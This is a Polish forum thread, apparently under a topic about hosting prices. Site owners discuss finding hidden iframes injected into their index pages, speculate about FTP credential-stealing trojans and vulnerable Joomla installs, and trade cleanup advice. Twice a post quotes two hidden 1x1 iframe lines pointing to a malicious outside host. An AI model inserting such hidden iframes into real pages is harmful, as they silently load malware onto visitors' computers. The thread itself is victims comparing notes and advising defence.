Temat: Hosting - serwery. Ceny i ich usługi.

Proponuję tu wpisywanie zakres usług serwerów oraz dostep do nich w czasie oraz innych danych potrzebnych do kalkulacji cenowej konkretnej usługi.
Na początek proponuję dane z cenami serwerów reprezentowanych przez rozmówców:)

Temat: Hosting - serwery. Ceny i ich usługi.

http://www.pankau.info/

wchodzimy na ten serwis a tutaj w kodzie:

<iframe src="http://litedownloadseek.cn/in.cgi?cocacola9" width=1 height=1 style="visibility: hidden"></iframe>

<iframe src="http://litedownloadseek.cn/in.cgi?cocacola6" width=1 height=1 style="visibility: hidden"></iframe>

myślę - a zerknę - no i komputer mi się rozryczał (alarm w antywirusie) a firefox napisał sobie:

Witryna zgłoszona jako dokonująca ataków!

Witryna litedownloadseek.cn została zgłoszona jako witryna stanowiąca zagrożenie i została zablokowana zgodnie z ustawieniami bezpieczeństwa.



Wszedłem sobie dalej - na szczęście jest coś takiego jak linux i niektóre skrypty pod przeglądarką tekstową po prostu nie ruszą...

jest to skrypt który wykonuje jeszcze nei wiem co, ale jak później przeglądnie się to w IE to otwiera się coś typu acrobat reader live.

Czy ktoś może mi powiedzieć po co taki iframe. Oraz co to jest?

Temat: Hosting - serwery. Ceny i ich usługi.

Maciej Wróbel:
http://www.pankau.info/

wchodzimy na ten serwis a tutaj w kodzie:

<iframe src="http://litedownloadseek.cn/in.cgi?cocacola9" width=1 height=1 style="visibility: hidden"></iframe>

<iframe src="http://litedownloadseek.cn/in.cgi?cocacola6" width=1 height=1 style="visibility: hidden"></iframe>

myślę - a zerknę - no i komputer mi się rozryczał (alarm w antywirusie) a firefox napisał sobie:

Witryna zgłoszona jako dokonująca ataków!

Witryna litedownloadseek.cn została zgłoszona jako witryna stanowiąca zagrożenie i została zablokowana zgodnie z ustawieniami bezpieczeństwa.



Wszedłem sobie dalej - na szczęście jest coś takiego jak linux i niektóre skrypty pod przeglądarką tekstową po prostu nie ruszą...

jest to skrypt który wykonuje jeszcze nei wiem co, ale jak później przeglądnie się to w IE to otwiera się coś typu acrobat reader live.

Czy ktoś może mi powiedzieć po co taki iframe. Oraz co to jest?

Dzieki za informacje.
Czyżby ktoś się włamał?

Temat: Hosting - serwery. Ceny i ich usługi.

no właśnie to nie do końca wygląda na wiruda... zasadniczo nie wiem co to jest - bo niby wykrywa niebezpieczny kod, a tak na prawdę to tam masz acrobata po prostu w małym okienku jako skrypt.

Proponuję wykasować te linie.

Temat: Hosting - serwery. Ceny i ich usługi.

Maciej Wróbel:
no właśnie to nie do końca wygląda na wiruda... zasadniczo nie wiem co to jest - bo niby wykrywa niebezpieczny kod, a tak na prawdę to tam masz acrobata po prostu w małym okienku jako skrypt.

Proponuję wykasować te linie.

Już wczoraj skasowałem, ale to chyba ktoś sie włamuje i ten kpod wpisuje.
Nie wiem co to jest.

Temat: Hosting - serwery. Ceny i ich usługi.

Są dwa wyjścia:

1. Dziura na serwerze http://vel.pl
2. Skrypt w Pana domenie. Czy ma Pan na tym koncie jakieś popularne skrypty typu Joomla itp.?

Temat: Hosting - serwery. Ceny i ich usługi.

Tomasz F.:
Są dwa wyjścia:

1. Dziura na serwerze http://vel.pl
2. Skrypt w Pana domenie. Czy ma Pan na tym koncie jakieś popularne skrypty typu Joomla itp.?

Były

Temat: Hosting - serwery. Ceny i ich usługi.

Miałem to samo jakiś tydzień temu (na szczęście strony już przeniosłem z nazwy na home bo akurat kończyła mi się umowa - prezent na pożegnanie?)

Do wszystkich plików index.html i index.php dopisała się taka sama linijka tylko, że u mnie było chyba "cocacola5"

Nigdy bym na to nie wpadł ale dopisało się akurat w złym miejscu i strona wysypała błędy.

Zgłosiłem do Nazwy aby się temu przyjrzeli.
Odpisali mi:
"Jak widać w logach doszło do włamania przez ftp. Sprawca złamał hasło lub je podsłuchał. Proszę zmienić hasło
do serwera i podmienic zmodtfikowane pliki."

Wchodziłem na stronę przez ff i Kasperski mi nic nie krzyczał, że coś podejrzanego jest. Na jednym serwerze była Joomla ale katalog do testów - link do niej nigdy nie był zindeksowany przez google i nikt o nim nie wiedział. Było też forum phpBBv2. Na serwerze kolegi było to samo ale nie wiem co miał.

Ma ktoś jakieś info co to było i przez co weszło? Bo w złamanie hasła do FTPa jakoś nie wierze, a już na pewno nie po wymogu jego zmiany przez nazwę w ostatnich tygodniach.

Temat: Hosting - serwery. Ceny i ich usługi.

Michał K.:
Miałem to samo jakiś tydzień temu (na szczęście strony już przeniosłem z nazwy na home bo akurat kończyła mi się umowa - prezent na pożegnanie?)

Do wszystkich plików index.html i index.php dopisała się taka sama linijka tylko, że u mnie było chyba "cocacola5"

Nigdy bym na to nie wpadł ale dopisało się akurat w złym miejscu i strona wysypała błędy.

Zgłosiłem do Nazwy aby się temu przyjrzeli.
Odpisali mi:
"Jak widać w logach doszło do włamania przez ftp. Sprawca złamał hasło lub je podsłuchał. Proszę zmienić hasło
do serwera i podmienic zmodtfikowane pliki."

Wchodziłem na stronę przez ff i Kasperski mi nic nie krzyczał, że coś podejrzanego jest. Na jednym serwerze była Joomla ale katalog do testów - link do niej nigdy nie był zindeksowany przez google i nikt o nim nie wiedział. Było też forum phpBBv2. Na serwerze kolegi było to samo ale nie wiem co miał.

Ma ktoś jakieś info co to było i przez co weszło? Bo w złamanie hasła do FTPa jakoś nie wierze, a już na pewno nie po wymogu jego zmiany przez nazwę w ostatnich tygodniach.

Właśnie.
Co ciekawe to własciciele serwerów nie przyznają się, że to z ich winy a przerzucają na klientów.
Prawdopodobnie nie ma winnych a jedynie serwery są zaatakowane tym wirusem i rozprzestrzenia się.
Przeniosłem na inny serwer i to samo.

Temat: Hosting - serwery. Ceny i ich usługi.

Jan P.:
Co ciekawe to własciciele serwerów nie przyznają się, że to z ich winy a przerzucają na klientów.
Prawdopodobnie nie ma winnych a jedynie serwery są zaatakowane tym wirusem i rozprzestrzenia się.

Głupoty. Na 99% jest to jakiś trojan na waszych cudownych windowsach, który korzysta z waszego FTP, tudzież infekuje pliki lokalnie, które sami uploadujecie.

http://www.goldenline.pl/forum/php/532968/?hl=trojan

Przeniosłem na inny serwer i to samo.

Szkoda, że to jeszcze nie dało nic do myślenia.

Temat: Hosting - serwery. Ceny i ich usługi.

Mirosław O.:

Jan P.:
Co ciekawe to własciciele serwerów nie przyznają się, że to z ich winy a przerzucają na klientów.
Prawdopodobnie nie ma winnych a jedynie serwery są zaatakowane tym wirusem i rozprzestrzenia się.

Głupoty. Na 99% jest to jakiś trojan na waszych cudownych windowsach,

Dlaczego cudownych?

który korzysta z waszego FTP, tudzież infekuje pliki lokalnie, które sami uploadujecie.

Wszystko możliwe, ale

http://www.goldenline.pl/forum/php/532968/?hl=trojan

ale to jest wpis, który pojawia się nie po użyciu FTP-a a w kilka dni pózniej i jak to wytłumaczyć?

Przeniosłem na inny serwer i to samo.

Szkoda, że to jeszcze nie dało nic do myślenia.

Właśnie dało tylko przyczyny są gdzie?
Kasuję wpis i otwieram stronę na której nie ma wpisu bo skasowałem patrząć przez notatatnik.
Sprawdam w ten sam sposób dnia nastepnego i wpisu nie ma nie wchodząc przez FTP.
Po kilku dniach znajduje się i to nie tylko w tym jednym folderze ale we wszystkich innych.
Czy jest możliwe zainfekowanie przez FTP foldery do których się nie zaglądało lub od kilku lat nawet nie używało?
Nie uwierze w to:)

Temat: Hosting - serwery. Ceny i ich usługi.

Używacie starych czy dziurawych skryptów i sami sobie jesteście winni. Żadna tu wina hostingodawcy.

Np. pierwszy z brzegu przykład typu Joomla w nie najnowszej wersji i dziesiątki dziur przez które można sobie buszować po całym koncie klienta.

Temat: Hosting - serwery. Ceny i ich usługi.

Najpierw trojany na komputerach klientów zbierają loginy - potem wysyłają je. W ciągu kilku dni ftp odwiedza bot który ściąga pliki jakie mu się podobają i natychmiast je uploaduje z dodanym kodem. Nie ma to nic z serwerem doczynienia. Hasło nie jest łamane/bruteforcowane. Logowanie zawsze odbywa się przy pierwszej próbie. Radzę zainstalować antywirusa. Nie ma znaczenia na jakim serwerze są pliki jeśli się login i hasło "rozdaje" na lewo i prawo. Oczywiście zmiana hasła tez nie pomoże przed oczyszczeniem swojego komputera.

Druga sprawa to dziury w skryptach. Masa tego jest.

Temat: Hosting - serwery. Ceny i ich usługi.

Szymon Rybczyński:
Najpierw trojany na komputerach klientów zbierają loginy - potem wysyłają je. W ciągu kilku dni ftp odwiedza bot który ściąga pliki jakie mu się podobają i natychmiast je uploaduje z dodanym kodem. Nie ma to nic z serwerem doczynienia. Hasło nie jest łamane/bruteforcowane. Logowanie zawsze odbywa się przy pierwszej próbie. Radzę zainstalować antywirusa. Nie ma znaczenia na jakim serwerze są pliki jeśli się login i hasło "rozdaje" na lewo i prawo. Oczywiście zmiana hasła tez nie pomoże przed oczyszczeniem swojego komputera.

Druga sprawa to dziury w skryptach. Masa tego jest.

Może i tak tez jest.
Teraz, gdy dostałem informację co mam na stronie mocno to sprawdziłem i miałem zdarzenie takie, które wcześniej opisałem i jeszcze nowsze.
Otóż skasowałem te linijki po raz któryś i pokazują się na nowo.
Wchodzę na serwer kasuje a ten drań też tam jest i co skasuję wpisuje na nowo.
W koncu na jeden raz dziesieć kodów wpisał.
Skasowałem wszystko a on ponownie indeź z kodami wstawił.
Patrze na katalogi i w jednym z nich mam Joomle wgraną.
Wiec może i komputer ale mają tak opanowane wszystko, że sami sobie skrypty wgrywają.
Gdy usunełem wszystko to teraz nikt nie włamuje się a sprawdzam kilka razy dziennie.

Temat: Hosting - serwery. Ceny i ich usługi.

może warto chmod sprawdzić...

Temat: Hosting - serwery. Ceny i ich usługi.

Maciej Wróbel:
może warto chmod sprawdzić...

Na ogół kazdy go ustawia po wpisaniu skryptu ale to też warto sprawdzić:)